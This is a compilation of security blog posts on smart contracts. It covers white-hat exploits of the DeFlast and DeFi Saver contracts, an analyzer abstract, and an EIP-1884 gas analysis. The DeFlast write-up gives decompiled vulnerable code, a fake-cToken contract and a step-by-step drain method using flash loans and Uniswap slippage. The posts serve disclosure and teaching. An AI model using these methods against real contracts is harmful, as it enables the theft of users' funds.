“Look Ma, No Source!” Hacking a DeFi Service With No Source Code Available

By the Dedaub team

This story describes a cool hack, for over $300K (even nearly $600K, if done at the right time). It is a white-hat hack. We performed it off-chain and demonstrated it to Dinngo, the authors of the vulnerable service; they reproduced it and applied it to rescue the funds of exposed accounts.

The hack is among the most instructive we have encountered, which is why we wanted to document it clearly. There’s something in it for everyone: it showcases the danger of token approvals, interesting financial manipulation, the use of different DeFi services (Aave, Compound, Uniswap) as part of the attack, and much more.

Furthermore, this is a rare, if not the first, case of hacking a fairly complex smart contract without any source code available. (At the time of implementing and confirming the attack, we had no idea who was the owner of the vulnerable contract, so we were going by available bytecode only.)

Let’s start from the high level, and we’ll get more and more technical, both in the finances and in the coding.

The End-User’s View

The hack affects two parties: the victim account (a wallet, not a contract), which holds the funds, and the enabler contract, which contains the vulnerable code. The vulnerability in the enabler allowed us to drain the victim’s funds, because the victim had approved the enabler for all of its cUSDC (about $580K). In fact, there were several victims, but in the rest of this article we discuss only the one we targeted, whose exposure was 100x higher than the next closest.

If you are a DeFi end-user and want to get just one useful thing out of this article, this is it: be very careful with token approvals from your accounts. You are giving the approved spender contract the ability to do anything with your tokens. A vulnerability in the contract can drain your account. As something actionable, check out the new (in beta) Etherscan token approval feature (here demonstrated on our victim account).

Here’s what the victim’s account approvals looked like at the time of the hack:

See the highlighted approval: a contract with no source code.

Notice something strange? We highlighted one of the approvals. Of 110 token approvals, 109 were done to contracts with source code, which anyone can inspect. And one approval is to 0x936de89…: our enabler. Our enabler is also a public service: DeFlast.finance, created by Dinngo.

But the lack of source code for the contract should give you pause. See how it sticks out in the list above!

To be clear, this is not how we found out about the victim and the enabler. Instead, we are regularly running automated analyses on the entire blockchain that warn us about contracts worth inspecting closely. But the above is a likely way in which a black-hat hacker would identify that something is fishy about our victim and that the attack vector involves the enabler: some funds have been trusted to code that will likely be checked by very few people.

So, if you have accounts that interact with DeFi protocols or other token services, do yourself a favor and inspect your approvals. Your hacker may not be white-hat.

Attack: High-Level View

The vulnerable contract (our enabler), decompiled by contract-library, has a bit of complexity. We will analyze it a little later, but, even if reverse engineering is not your cup of tea, the high-level description is interesting.

The contract’s executeOperation (normally called after an Aave flash loan) takes as parameters a client account, two Compound cTokens, the flash loan balance, and some amounts. It then does the following:

  • mints new cToken up to the specified amount
  • liquidates (“redeems”) the client’s original cTokens (e.g., cUSDC) and transfers the underlying tokens to itself, the enabler
  • swaps the tokens from the previous step on Uniswap v1 into the token of the loan
  • repays the flash loan.

In the attack, the client is the victim account. But the code does not let anyone directly get the victim’s funds; it only forces a swap of the victim’s tokens from one kind of cToken into another.

So, how can this be exploited?

If you think about it in real-life terms, you already know the answer. You have someone forced to buy goods of your choice. How can you drain their funds?

By selling them worthless goods for a high price, of course!

Therefore, in order to attack, we did the following:

  • create our own ERC20 token
  • create a fake cToken (dummy methods, just returning the expected return codes) for this ERC20 token
  • create a Uniswap v1 exchange and liquidity pool for our ERC20 token, so that it can be traded
  • call the function with our parameters. The victim’s tokens (USDC) were transferred into our liquidity pool (after being converted to ETH), and the victim got worthless tokens in exchange
  • exit the liquidity pool, get ETH.

A cute element of the attack is that we don’t even need a sizeable liquidity pool to begin with — we can exploit Uniswap’s constant-product price calculation. That is, we don’t just make the victim buy worthless tokens, we make them buy 99.99+% of the worthless tokens’ supply, in order to drive the price up so much that the victim needs to spend all their assets! The exact percentage was carefully calculated based on the victim’s cUSDC balance.

If you think this is complex, consider this: we had never created either a cToken or a Uniswap v1 liquidity pool in code before, yet it took us only half a day to implement the basic attack. The steps are certainly well within reach of a sophisticated hacker.

The reality got complicated by a few nasty details, such as outstanding loans, extra swaps to counter slippage, etc. But the heart of the attack is well-captured in this summary.

Attack: Technical View

The first (but not foremost) complication in this attack is that the enabler contract (DeFlast’s) has no source code available. However, contract-library.com offers a reasonably good decompilation of it. Starting from the public executeOperation function (typically the callback of an Aave flash loan) we can understand a lot of the code. Here are two key functions of the decompiled code, before any effort to manually improve:

function executeOperation(address _reserve, uint256 _amount, uint256 _fee, bytes _params) public nonPayable { 
    require(msg.data.length - 4 >= 128);
    require(_params <= 0x100000000);
    require(4 + _params + 32 <= 4 + (msg.data.length - 4));
    require(!((_params.length > 0x100000000) | (36 + _params + _params.length > 4 + (msg.data.length - 4))));
    v0 = new bytes[](_params.length);
    CALLDATACOPY(v0.data, 36 + _params, _params.length);
    MEM[v0.data + _params.length] = 0;
    v1 = 0x148f(_reserve, this);
    require(_amount <= v1, 'Invalid balance for the contract');
    require(v0.length >= 128);
    v2 = 0xdad(MEM[v0.data]);
    v3 = 0xdad(MEM[v0.data + 32]);
    0x13f6(MEM[v0.data + 96], _amount, MEM[v0.data + 32]);
    0xe5b(MEM[v0.data + 96], MEM[v0.data + 64], MEM[v0.data]);
    v4 = 0x10f2(this, v2);
    v5 = _SafeAdd(_fee, _amount);
    v6 = 0x11b5(v5, v4, v3, v2);
    v7 = 0x10f2(this, _reserve);
    v8 = _SafeAdd(_fee, _amount);
    require(v7 >= v8, 'Token balance not enough for repaying flashloan.');
    v9 = _SafeAdd(_fee, _amount);
    0x15b1(v9, _reserve);
}
...
function 0xe5b(uint256 varg0, uint256 varg1, uint256 varg2) private { 
    v0 = address(varg0);
    MEM[v1.data] = varg1;
    v2 = address(varg2);
    require(v2.code.size);
    v3, v4 = v2.transferFrom(v0, this).gas(msg.gas);
    require(v3); // checks call status, propagates error data on error
    require(RETURNDATASIZE() >= 32);
    require(1 == v4, 'Failed to transfer cToken from user when redeeming');
    v5 = address(varg2);
    v6 = v1.data;
    require(v5.code.size);
    v7, v8 = v5.approve(v5, varg1).gas(msg.gas);
    require(v7); // checks call status, propagates error data on error
    require(RETURNDATASIZE() >= 32);
    require(1 == v8, 'Failed to approve cToken to Token Contract when redeeming');
    v9 = address(varg2);
    require(v9.code.size);
    v10, v11 = v9.redeem(varg1).gas(msg.gas);
    require(v10); // checks call status, propagates error data on error
    require(RETURNDATASIZE() >= 32);
    require(!v11, 'Failed to redeem underlying token.');
    v12 = 0xdad(varg2);
    v13 = 0x10f2(this, v12);
    v14 = address(varg2);
    emit 0xaface4c9957b8058dd049dc2a148905af00a14f8ef10dc658a81d03f527ab906(v14, v13);
    return ;
}

After an afternoon of manual polishing, here’s the result of our reverse engineering for the same two functions:

// _reserve is the underlying token of ctoken1, or they both pretend it is
// ctoken0 has to be a true CToken: CUSDC
// numTokens is the amount of the victim's CTokens we want to/can get
function executeOperation(address _reserve, uint256 _amount, uint256 _fee, bytes _params) public nonPayable { 
    require(_params.length <= 256);
    require(_amount <= getBalance(_reserve, this), 'Invalid balance for the contract');
          // need to have a balance with token _reserve
    ctoken0 = _params[0]; // certain ctoken
    ctoken1 = _params[1];
    numTokens = _params[2];
    owner = _params[3];
    token0 = getUnderlyingForCToken(ctoken0);
    token1 = getUnderlyingForCToken(ctoken1);
    mintCTokenForOwner(owner, _amount, ctoken1);  // mint amount of ctoken and transfer to owner
    redeemCTokenReceiveUnderlying(owner, numTokens, ctoken0);
       // get owner's ctoken, redeem it, get underlying token in "this" contract
    v4 = getBalance(this, token0);
    amountPlusFee = _SafeAdd(_fee, _amount);
    v6 = swapTokens(amountPlusFee, v4, token1, token0);
       // swaps (on Uniswap v1) the tokens this contract got, to have enough to repay the loan
    v7 = getBalance(this, _reserve);
    v8 = _SafeAdd(_fee, _amount);
    require(v7 >= v8, 'Token balance not enough for repaying flashloan.');
    v9 = _SafeAdd(_fee, _amount);
    repayFlashLoan(v9, _reserve);
}

function redeemCTokenReceiveUnderlying(uint256 owner, uint256 numTokens, uint256 ctoken) private { 
    ok, v4 = ctoken.transferFrom(owner, this, numTokens).gas(msg.gas);
    require(1 == v4, 'Failed to transfer cToken from user when redeeming');
    v5 = ctoken;
    ok, v8 = ctoken.approve(v5, numTokens).gas(msg.gas);
    require(1 == v8, 'Failed to approve cToken to Token Contract when redeeming');
    ok, v11 = ctoken.redeem(numTokens).gas(msg.gas);
    require(!v11, 'Failed to redeem underlying token.');
    v12 = getUnderlyingForCToken(ctoken);
    v13 = getBalance(this, v12);
    emit 0xaface4c9957b8058dd049dc2a148905af00a14f8ef10dc658a81d03f527ab906(ctoken, v13);
    return ;
}

Keep in mind that, at the time of doing this, we had no idea what high-level service used this contract: we had not linked it to DeFlast, nor did we even know what DeFlast was. But the contract’s intent is not too hard to discern from the code: a user’s cTokens are swapped for different cTokens (specified in the parameters) with the help of a flash loan. First, the flash loan funds allow minting the new cToken. Then, the old cTokens are redeemed. The proceeds of the redemption (the old underlying tokens) are swapped on Uniswap v1 for enough of the loan’s token to repay the flash loan.

However, there is no safeguard to ensure that this code is indeed called after a flash loan. Even such a safeguard alone would not have made the code safe: one could take out a minuscule flash loan and call the contract with the desired parameters. More importantly, the code does not check that the flash loan “reserve” token is the same as the “underlying” of the new cToken, nor that what the user gets back is real cTokens (and not merely something pretending to be a cToken).

So, we have a forced swap in our hands. All we need to do is make sure the code doesn’t crash from underneath us. We can create our own worthless token, wrap it in a cToken, and we can build our own market for trading them. In fact, our cToken can be entirely fake: it just needs to return the right underlying token (our worthless token) and provide the expected return values: return 0 for mint and redeem, true for transfer and approve, etc.

pragma solidity ^0.7.0;

contract CMyToken {
    address private _underlying;
    constructor (address underlying) public {
        _underlying = underlying;
    }
    function underlying() public view returns (address) {
        return _underlying;
    }
    // funny how you think this matters
    function exchangeRateCurrent() public pure returns (uint256) {
        return 10 ** 18;
    }
    function mint(uint ) public pure returns (uint256) {
        return 0;  // means no error
    }
    function transfer(address, uint) public pure returns (bool) {
        return true; // whatever you say, boss
    }
    function transferFrom(address, address, uint256) public pure returns (bool) {
        return true; // at your command
    }
    function approve(address, uint256) public pure returns (bool) {
        return true;
    }   
    function redeem(uint) public pure returns (uint) {
        return 0;
    }
}

We then created an exchange for our token on Uniswap (v1, since that’s what the vulnerable code uses) and added a little bit of liquidity to it: about 0.001 ETH against a tiny amount of our worthless token.

The beauty of Uniswap’s model is that it is so amazingly general, yet robust. It allows anyone to create an exchange and provide liquidity. Prices are determined entirely on-chain. However, the reliability of Uniswap prices depends on others jumping in and correcting exchange rate anomalies. Yet in our forced swap, there are no “others”! The market never gets a chance to adjust the price and restore our worthless token to its … worthlessness. (Even if a bot had been tempted to trade with us, we installed a trap in our worthless token, not allowing it to be traded outside the attack transaction.)

By instructing the enabler contract to trade the victim’s cTokens for our cTokens, we can perform a successful attack. As mentioned earlier, we deliberately caused enormous slippage: our pool initially had just 0.001 ETH against 0.0000001 of our worthless token. Still, we instructed the enabler to swap for over 99.9996% of the worthless token’s supply, the exact number being computed so that it would exhaust the victim’s funds.
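To make the slippage arithmetic concrete, here is a minimal sketch of what it costs to buy a given share of a constant-product pool. The formula follows the shape of the Uniswap v1 output-price calculation (with its 0.3% fee) as we understand it. The function name and the 18-decimal token are assumptions made for illustration; the pool sizes and the 99.9996% share are the ones quoted above.

```python
WEI = 10**18

def eth_cost_for_tokens(tokens_out, eth_reserve, token_reserve):
    """ETH (in wei) needed to buy `tokens_out` from a constant-product pool.

    Mirrors the shape of Uniswap v1's output-price formula with a 0.3% fee;
    treat it as an illustrative model, not the exchange's exact code.
    """
    assert 0 < tokens_out < token_reserve
    numerator = eth_reserve * tokens_out * 1000
    denominator = (token_reserve - tokens_out) * 997
    return numerator // denominator + 1

# Pool as described in the text: 0.001 ETH against 0.0000001 token
# (assuming a hypothetical token with 18 decimals).
eth_reserve = WEI // 1000                            # 0.001 ETH
token_reserve = 10**11                               # 0.0000001 token
tokens_out = token_reserve * 999_996 // 1_000_000    # 99.9996% of the pool

cost_wei = eth_cost_for_tokens(tokens_out, eth_reserve, token_reserve)
print(cost_wei / WEI)  # roughly 250 ETH for a pool seeded with 0.001 ETH
```

In this model the cost grows without bound as the purchased share approaches 100%, which is why the share can be tuned to match whatever the victim holds.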

A further complication is that the victim was using their cUSDC as collateral for Compound loans. The loan view of the account looked like this:

Victim had $580K in vulnerable assets, securing loans of about $280K.

The total value of outstanding loans at the moment of the attack was around $280K, with collateral at $580K. A direct attack cannot get the $300K difference but only about two-thirds of that, since the Compound Comptroller would not allow transferring out money that would violate the loan collateralization limits. But this is easy to address: we just take $280K in flash loans, repay the victim’s loans, drain the $580K and pay off the flash loans.
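The collateral arithmetic can be sketched as follows. The dollar amounts are the rounded figures above. The 75% collateral factor is our assumption for illustration (the text does not state it), and flash loan fees are ignored.

```python
def max_direct_withdrawal(collateral, debt, collateral_factor):
    """Largest amount of collateral that can leave the account while the
    remaining collateral still covers the debt at the given factor."""
    required_collateral = debt / collateral_factor
    return max(0.0, collateral - required_collateral)

def drain_with_flash_loan(collateral, debt):
    """Borrow `debt`, repay the victim's loans, take all the collateral,
    then repay the flash loan. Returns what is left over (fees ignored)."""
    return collateral - debt

collateral, debt = 580_000, 280_000
direct = max_direct_withdrawal(collateral, debt, collateral_factor=0.75)  # assumed factor
full = drain_with_flash_loan(collateral, debt)
print(round(direct), full)  # about 206667 vs 300000
```

Under the assumed factor, the direct route yields a bit over two-thirds of the $300K difference, while the flash loan route yields all of it.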

A final complication is that the Uniswap v1 pools are too shallow nowadays. The USDC pool has around $650K liquidity at the time of this writing. Since the vulnerable code forces a swap of the proceeds on Uniswap v1, we suffer tremendous slippage. A Uniswap v1 swap between USDC and our worthless token is really two swaps with ETH in the middle: first USDC to ETH, then ETH to our token. The first of these swaps, for $580K out of the $650K available, nets a lot less ETH than it should.

However, this is easily countered: once we exit our own liquidity pool, before the end of the transaction, we perform an inverse swap of ETH for USDC and exploit all the slippage we just caused. In the end, we are left with the right amount of the victim’s USDC.
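A toy simulation shows why the inverse swap recovers most of the loss. The pool reserves below are hypothetical round numbers, not the actual state of the Uniswap v1 USDC pool, and the model assumes nobody else trades in between, which holds inside a single transaction.

```python
def swap(amount_in, reserve_in, reserve_out, fee=0.003):
    """Constant-product swap with a proportional fee on the input.
    Returns (amount_out, new_reserve_in, new_reserve_out)."""
    effective_in = amount_in * (1 - fee)
    amount_out = reserve_out * effective_in / (reserve_in + effective_in)
    return amount_out, reserve_in + amount_in, reserve_out - amount_out

usdc_reserve, eth_reserve = 325_000.0, 250.0   # hypothetical pool
start_price = usdc_reserve / eth_reserve       # USDC per ETH before the swap
usdc_in = 580_000.0

# Forced swap: USDC -> ETH, at a far worse rate than the starting price.
eth_out, usdc_reserve, eth_reserve = swap(usdc_in, usdc_reserve, eth_reserve)
# Inverse swap later in the same transaction: ETH -> USDC.
usdc_back, eth_reserve, usdc_reserve = swap(eth_out, eth_reserve, usdc_reserve)

print(eth_out, usdc_in / start_price)  # ETH received vs ETH at the starting price
print(usdc_back)                       # USDC recovered by the inverse swap
```

In this model the forced swap nets well under half of the ETH that the starting price would suggest, yet the round trip as a whole loses only a fraction of a percent to fees.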

Actual Rescue Operation

The above is the attack we performed locally last week (the last week of Jan. 2021), confirming the vulnerability. We then made an effort to locate the owner of the victim account, but a couple of messages (speculative, based on past activity) yielded nothing.

Only at that point did we search for the owners of the enabler contract and find a link to DeFlast.finance! This was a relief. Not only did we now have a contact that could authorize a white-hat attack, but the contact was a high-quality team, also behind other projects that we had recently inspected thoroughly.

We contacted Hsuan-Ting Chu, the CEO of Dinngo, since he was the most obvious point of contact for escalating the report of a critical vulnerability. Within a few hours we were in a meeting with Hsuan-Ting and Dinngo engineers where we presented the attack.

The Dinngo team took over the rescue operation, following the blueprint of our attack, and moved the victim’s positions to another wallet. Other victims were similarly moved in the past 48 hours. The operation was done very smoothly and professionally, especially considering the complexity of the attack (check out the transaction for the main victim)!

Concluding

This was a cool hack. It started from a bad smell: code that didn’t seem to be checking that it’s used only in its intended scenarios. Despite not having source code, we followed a hunch and spent some time reverse engineering. The vulnerability then required financial manipulation. Creating an exchange. Exploiting slippage. Getting flash loans. Paying off Compound loans. Countering slippage.

All in a day’s work…


Saving DeFi Saver with Static Contract Analysis

By the Dedaub team

A little after midnight on Jan. 5, we contacted the DeFi Saver team with news of a critical vulnerability that we had discovered in one of their deployed smart contracts and had just managed to exploit (offline). They responded immediately and we got on a channel with several DeFi Saver people within 5 minutes. Less than 20 hours later, client funds had been migrated to safety via a white-hat exploit.

There were some interesting elements in this vulnerability.

  • It affected major clients of the service. We initially demonstrated by exploiting one client for $1.2M. Another client had $2.2M exploitable and several more had smaller positions. There were over 200 clients that had deposited money in the vulnerable service within the past two months so the overall exploit potential was possibly even higher at different times.
  • The vulnerability was originally flagged by a sophisticated static analysis, not by human inspection. This is rare. Automated analyses typically yield low-value warnings in monetary terms. We have submitted (back in Nov.) a technical paper on the analysis techniques.
  • Beyond the static analysis, the vulnerability requires a significant combination of dynamic information and careful orchestration. To exploit, one needs to find clients that have still-outstanding approvals (granted to the vulnerable contract) and an active balance for the same ERC-20 token. Then one needs to retrieve the loans that the victim holds on Compound (on different currencies) and pay them off (via a flash loan or otherwise). At that point, all the victim’s funds in the ERC-20 token are available for transfer to the attacker.
    For instance, the prototype victim had $2M in assets that could be acquired by paying off a $735K loan. The even larger victim had $3.7M in assets and a $1.5M outstanding loan.
  • Salvaging the users’ funds was highly elegant, by using precisely the flash loan and proxy authorization functionality of DeFi Saver.

Next we give some more technical detail on the above. For the service-level picture, there is a writeup by the DeFi Saver team.

Static Analysis | The Vulnerability

The vulnerable code could be found in two different DeFi Saver contracts. You can see the vulnerable function from one of the contracts in the snippet below:

Vulnerable code, one instance

This is helper functionality — a small, deeply-buried cog in a much larger machine. The comments reveal the intent. This is a function that gets called upon receiving an Aave flash loan, repays a Compound loan on behalf of a user, lets a caller-defined proxy execute arbitrary code, and then repays the flash loan with the money received from the proxy. However, all of this is irrelevant. “Ignore comments, debug only code” as the saying goes for the security-sensitive. And this code allows a lot more than the comments say.

Static Analysis | Automated Analysis and Finding the Vulnerability

Our main job is developing program analysis technology (including contract-library.com and the decompiler behind it). In the past half year we have started deploying a new analysis architecture that combines static analysis and symbolic execution. (We call it “symbolic value-flow analysis” and we will soon have full technical papers about it.) We found the DeFi Saver vulnerability while testing a new client for this analysis: a precise detector of “unrestricted transferFrom proxy” functionality.

Basically, when our analysis looked at the above code, it only saw it like this:

Analysis view of the vulnerable functionality. We can control all parameters of the transferFrom but the last

All the red-highlighted elements are completely caller-controllable. There are few to no restrictions on what _reserve, cBorrowToken, user, proxy, etc. can be. Basically, our analysis did not see this piece of code as an “Aave callback after a flash-loan operation” but as a general-purpose lever for doing transferFrom calls on behalf of any contract unfortunate enough to have authorized the vulnerable contract.

Small tangent: You may say, this doesn’t look like it needs a very sophisticated analysis. It is pretty clear that the caller can set all these variables and they end up in sensitive positions in the transferFrom call. Indeed, even a naive static analysis would flag this instance. What made our symbolic value-flow analysis useful was not that it captured this instance but that it avoided warning about others that were not vulnerable. The analysis gave us just 27 warnings about such vulnerabilities out of the 40 thousand most-recently deployed contracts! This is an incredibly precise analysis and most of these warnings were correct (although typically no tokens were at risk).

Back to the vulnerability: Finding a transferFrom statically does not imply an exploitable vulnerability. (If it did, we would have tens more vulnerabilities in our hands — the analysis issued 27 reports, as we mentioned, and most were correct.) Indeed, to perform the transferFrom there are three more dynamic requirements, based on the current state of the contracts. First, the vulnerable contract needs to have a current allowance to transfer the tokens of a victim. Second, the victim needs to have tokens. As it turns out, users of the DeFi Saver service were in exactly that state relative to the vulnerable contract. Our prototype victim shows both a balance and an allowance for the vulnerable contract:


The victim has (at the moment of the snapshot) some $2M in underlying assets (in the cWBTC coin). So, since we can do an uncontrolled transferFrom we can get all of that, right? Well, not quite. The transferFrom on a Compound CToken goes through the Compound Comptroller service, which checks the outstanding loans over the underlying assets. If the transferFrom would make the account liquidity negative, it is not allowed. Our prototype victim indeed has outstanding Compound loans — this is in fact the reason they are in this state of balances and allowances.

Etherscan Loans view of one of the vulnerable clients. $735K of outstanding loans, $2M in collateral.

The victim has $2M in assets and $735K in outstanding loans. So, could we just ask for less money and do the transferFrom? Actually, no. If you check the vulnerable code from before, the last parameter, cTokenBalance, of the transferFrom is not caller-controllable! It is instead the full balance of the victim.

This brings us to the third dynamic requirement for exploiting the vulnerability. In order to call this transferFrom and get the victim’s assets, we first need to pay off their loans!
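The three dynamic requirements can be summarized as a simple filter over on-chain state. The sketch below is an illustrative model, not the analysis tool itself: the `Candidate` record and its fields are hypothetical, the dollar values are the rounded figures quoted above, and the allowance is modeled as unlimited.

```python
from dataclasses import dataclass

@dataclass
class Candidate:
    allowance: float   # allowance granted to the vulnerable contract (USD value)
    balance: float     # victim's cToken balance (USD value)
    debt: float        # victim's outstanding Compound loans (USD value)

def exploit_plan(c):
    """Return (repayment_needed, net_gain), or None if not exploitable."""
    if c.balance <= 0:             # requirement 2: the victim holds tokens
        return None
    if c.allowance < c.balance:    # requirement 1: the allowance must cover the full
        return None                # balance, as the amount is not caller-controllable
    # Requirement 3: the loans are repaid first, so that transferring the
    # full balance does not leave the account undercollateralized.
    return c.debt, c.balance - c.debt

prototype = Candidate(allowance=float("inf"), balance=2_000_000, debt=735_000)
print(exploit_plan(prototype))  # (735000, 1265000)
```

For the prototype victim this gives a net of about $1.2M after repaying the $735K loan.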

This exploit is precisely what we demonstrated to the DeFi Saver team upon disclosing the vulnerability.

The Salvage Operation

Our prototype exploit ran on a private fork of the blockchain. For the real salvaging operation, we collaborated with the DeFi Saver team. Once we discussed the plan, they took the lead in the implementation.

The salvage operation was a thing of beauty, if we may say so. The DeFi Saver team performed it very professionally, with simpler code than our original exploit. The very same vulnerable functionality (the “cog”) was used after a flash loan in order to empty the victims’ accounts and transfer the vulnerable funds to new accounts that were then assigned to the original owner.
[Relevant transactions for the two victims with the largest holdings here and here.]


Part of the elegance of the solution was that, in the end, the owners of the victim contracts held exactly the same positions as before, only now in two contracts instead of one. They had as much in underlying assets as before, and exactly as much in outstanding loans as before.

Wrapping Up

This was a very interesting vulnerability to us, although the root cause was simple (insufficient protection against hostile callers). It has many of the elements that we think are going to be central in future vulnerability detection work:

  • Combinations of static and dynamic analysis to find the vulnerable instance. Human eyes cannot be inspecting all code in great depth, even when the stakes are so high. A mundane piece of functionality can be security-critical. Static analysis is essential. Yet it’s not enough. The results will have to be cross-referenced with the current dynamic state to see if the contract is actually used in a vulnerable manner.
  • Future vulnerabilities may often follow the pattern of using existing pieces of code in unexpected ways. The more this happens, the more exploit generation will need to take current state into account. In this case, to exploit a contract, the attacker needs to pay off the contract’s loans. In the DeFi space, understanding of such state constraints will be crucial for future security work.

PS. If we might have saved you funds and/or you want to show support for our security efforts, we’ll be happy to receive donations at 0xACcE1553C83185a293e8B4865307aF8309af9407 .

Ethainter: A Smart Contract Security Analyzer for Composite Vulnerabilities

Smart contracts on permissionless blockchains are exposed to inherent security risks due to interactions with untrusted entities. Static analyzers are essential for identifying security risks and avoiding millions of dollars worth of damage.
We introduce Ethainter, a security analyzer checking information flow with data sanitization in smart contracts. Ethainter identifies composite attacks that involve an escalation of tainted information, through multiple transactions, leading to severe violations. The analysis scales to the entire blockchain, consisting of hundreds of thousands of unique smart contracts, deployed over millions of accounts. Ethainter is more precise than previous approaches, as we confirm by automatic exploit generation (e.g., destroying over 800 contracts on the Ropsten network) and by manual inspection, showing a very high precision of 82.5% valid warnings for end-to-end vulnerabilities. Ethainter’s balance of precision and completeness offers significant advantages over other tools such as Securify, Securify2, and teEther.


Rising Gas Prices Are Threatening Our Security (No, It’s Not the Saudi Attack)

Mr. Out of gas exception

EIP 1884 is set to be implemented into the upcoming Ethereum ‘Istanbul’ hard fork. It:

  • increases the cost of opcode SLOAD from 200 to 800 gas
  • increases the cost of BALANCE and EXTCODEHASH from 400 to 700 gas
  • adds a new opcode SELFBALANCE with cost 5.

Due to a fixed gas limit (2300) imposed by the .send(..) and .transfer(..) Solidity functions, fallback functions that use these opcodes may now start to fail due to an out-of-gas exception.
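As a rough illustration of the budget problem, the sketch below adds up only the repriced opcodes against the 2300 gas stipend. The opcode prices are the ones listed above; the fallback that reads three storage slots is a hypothetical example, and every other opcode is ignored, so the totals are lower bounds.

```python
STIPEND = 2300  # gas forwarded by .send(..) and .transfer(..)

COSTS_BEFORE = {"SLOAD": 200, "BALANCE": 400, "EXTCODEHASH": 400}
COSTS_AFTER = {"SLOAD": 800, "BALANCE": 700, "EXTCODEHASH": 700}

def repriced_gas(opcode_counts, costs):
    """Gas spent on the repriced opcodes only; all other opcodes in the
    fallback are ignored, so this is a lower bound on the real cost."""
    return sum(costs[op] * n for op, n in opcode_counts.items())

fallback = {"SLOAD": 3}  # hypothetical fallback reading three storage slots
before = repriced_gas(fallback, COSTS_BEFORE)
after = repriced_gas(fallback, COSTS_AFTER)
print(before, before <= STIPEND)  # 600 True
print(after, after <= STIPEND)    # 2400 False
```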

Analysis by Contract-library.com team

Contract-library.com, an automated security service, performs sophisticated static analysis on all deployed smart contracts (over 20 million of them). As static analysis is a technique that takes into account all (or almost all) possible program executions, it is expected to return the most comprehensive list of smart contracts affected by security vulnerabilities.

On Friday, August 16th, Martin Holst Swende of the Ethereum Foundation asked a question on the ETHSecurity channel on Telegram about how to go about finding smart contracts whose fallback function may fail due to EIP-1884. Since contract-library.com already had gas consumption analysis built into its core static analyses, we reached out on the same day with a list of contracts (continuously updated) that may be affected.

Over the subsequent days, also with the input of Martin Holst Swende, the gas cost analysis computation was updated and improved, over several iterations. The analysis currently reveals over 800 contracts that are highly likely to fail if called with 2300 gas (whereas they would succeed prior to EIP-1884). A subsequent, more general, analysis was also developed. This would be the most comprehensive list of possibly affected smart contracts for this particular issue, but also contains many false positives. This more general “may” analysis reveals that 7000 currently deployed smart contracts may fail under some execution paths with 2300 gas.

In addition, since our analysis is fully automated, we have also performed experiments to see whether these issues can be simply avoided by repricing the LOG0, LOG1 ... opcodes. Note that these opcodes tend to occur quite often in fallback functions. By halving the Glog and Glogtopic gas costs (refer to the yellow paper), the number of flagged contracts is reduced by approximately half!
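To see why LOG pricing matters, here is a small sketch of the LOG gas formula using the yellow paper constants (Glog = 375, Glogtopic = 375, Glogdata = 8 per byte). The fallback being priced is hypothetical: two storage reads plus one event with a single topic and 32 bytes of data, with all other opcodes and memory expansion ignored.

```python
G_LOG, G_LOGTOPIC, G_LOGDATA = 375, 375, 8   # yellow paper fee schedule
SLOAD_AFTER_1884 = 800
STIPEND = 2300

def log_gas(topics, data_bytes, g_log=G_LOG, g_topic=G_LOGTOPIC):
    """Gas for a LOGn opcode with `topics` topics and `data_bytes` bytes
    of data (memory expansion ignored)."""
    return g_log + g_topic * topics + G_LOGDATA * data_bytes

# Hypothetical fallback: two SLOADs and one LOG1 carrying 32 bytes of data.
sloads = 2 * SLOAD_AFTER_1884
current = sloads + log_gas(1, 32)
halved = sloads + log_gas(1, 32, g_log=G_LOG // 2, g_topic=G_LOGTOPIC // 2)
print(current, current <= STIPEND)  # 2606 False
print(halved, halved <= STIPEND)    # 2230 True
```

In this example the fallback exceeds the stipend at current LOG prices and fits again once Glog and Glogtopic are halved.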

Although repricing opcodes can always break contracts, the EVM should be able to evolve too. Clearly, a decent number of contracts will be broken due to this change, so care must be taken to lessen the impact on the overall ecosystem. In this case, we recommend repricing the LOGx opcodes, which seem to be mispriced anyway. This way, there will be fewer contracts affected.

A more interesting, but perhaps equally serious, side-effect of EIP-1884 and EIP-2200 combined is that it lowers the cost of performing an unbounded mass iteration attack, which is currently quite high. This attack is described in MadMax. In summary, this is an attack carried out by an unauthorized user, to increase the size of an array or data structure, which is iterated upon by any other user, rendering the functionality inaccessible by increasing gas cost beyond the block gas limit. The combined effect of EIP-1884 and EIP-2200 makes this kind of attack around 7 times cheaper on average, rendering it much more feasible. This attack requires 2 SSTOREs per array element that is added by the attacker. This array is then iterated upon by the victim, requiring an additional SLOAD. For a list of contracts that may be susceptible to unbounded iteration, we have you covered. The list contains approximately 15k contracts.

Which contracts will be affected? What about the one I’m currently developing?

If your contract does not have fallbacks (which may fail with 2300 gas) or is not susceptible to unbounded iteration, then you’re most probably fine. If it is, you may still be ok, but further investigation is necessary. If you would like to see whether the contract you are developing may be affected, deploy it to one of the Ethereum testnets and check your results at contract-library.com.

Below are sample contracts with a non-zero Ether balance that are affected by the repricing of SLOAD operations, so that their fallback is no longer runnable under the send/transfer gas allowance of 2300.

KyberNetwork

function() public payable {
        require(reserveType[msg.sender] != ReserveType.NONE);
        EtherReceival(msg.sender, msg.value);
    }

NEXXO crowdsale:

modifier onlyICO() {
        require(now >= icoStartDate && now < icoEndDate, "CrowdSale is not running");
        _;
    }
    function () public payable onlyICO{
        require(!stopped, "CrowdSale is stopping");
    }

For NEXXO, the fallback reads three storage slots (icoStartDate, icoEndDate and stopped), totalling 2400 gas (three SLOADs at 800 gas each) under the new gas rules.
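The arithmetic behind this can be sketched in a few lines of Python. This is a rough illustration only: it counts just the SLOAD instructions and ignores every other opcode in the fallback, and the constant and function names are ours, not part of any tool.

```python
# Gas forwarded to a fallback by send/transfer.
STIPEND = 2300
# SLOAD price before and after EIP-1884.
SLOAD_GAS_OLD = 200
SLOAD_GAS_NEW = 800

def sload_gas(num_slots_read, gas_per_sload):
    """Gas spent on storage reads alone (all other opcodes ignored)."""
    return num_slots_read * gas_per_sload

# NEXXO reads icoStartDate, icoEndDate and stopped: three slots.
nexxo_old = sload_gas(3, SLOAD_GAS_OLD)
nexxo_new = sload_gas(3, SLOAD_GAS_NEW)
print(nexxo_old, nexxo_new, nexxo_new > STIPEND)
```

Under the old price the three reads fit comfortably in the stipend; under the new price the reads alone already exceed it.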

Crowd Machine Compute Token crowdsale:

modifier onlyIfRunning
  {
    require(running);
    _;
  }
  function () public onlyIfRunning payable {
    require(isApproved(msg.sender));
    LogEthReceived(msg.sender, msg.value);
  }

Important reminder: the crowdsales above do not inherently break; callers just need to supply more than 2300 gas to take part in the ICO contracts.

CappedVault

  • Fallback function:
function () public payable {
        require(total() + msg.value <= limit);
    }

Unknown Harvester with 5 ETH

